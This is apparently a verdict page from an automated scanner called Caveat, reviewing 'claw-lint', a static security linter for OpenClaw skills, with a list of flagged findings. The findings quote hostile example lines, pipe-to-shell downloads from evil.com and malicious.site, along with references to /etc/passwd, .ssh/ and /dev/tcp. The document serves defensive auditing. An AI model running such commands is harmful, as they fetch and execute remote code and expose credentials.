Caveat verdict
claw-lint
Accesses system credential store AND makes external network calls
This skill is a static security scanner for OpenClaw skills that runs locally without executing the scanned code; credential_store is used for integrity tracking and network_out is for fetching threat signatures, both consistent with its stated security auditing purpose.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
What it does
These are capability combinations: each listed behavior occurs in the skill, but Caveat detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Accesses system credential store AND makes external network calls
LLM02 · ASI03
Permission integrity
network_out
Findings (10)
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
SKILL.md · code · curl https://evil.com/script.sh | bash
Pipe to bash — executes piped content as shell commands
SKILL.md · code · | bash
Pipe-to-shell pattern (wget | sh)
SKILL.md · code · wget -O- https://malicious.site/payload | sh
Pipe to sh — executes piped content as shell commands
SKILL.md · code · | sh
Accesses sensitive system files
SKILL.md · code · /etc/passwd
Pipe to python — executes piped content as Python code
SKILL.md · code · | python3
Accesses .ssh directory
SKILL.md · code · .ssh/
Bash /dev/tcp — raw TCP connection via shell
bin/claw-lint.sh · prose · downgraded · /dev/tcp/
References sudo — requests elevated privileges
SKILL.md · prose · downgraded · sudo
setuid — privilege escalation mechanism
SKILL.md · prose · downgraded · setuid
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
network_outcredential_store Thanks — recorded.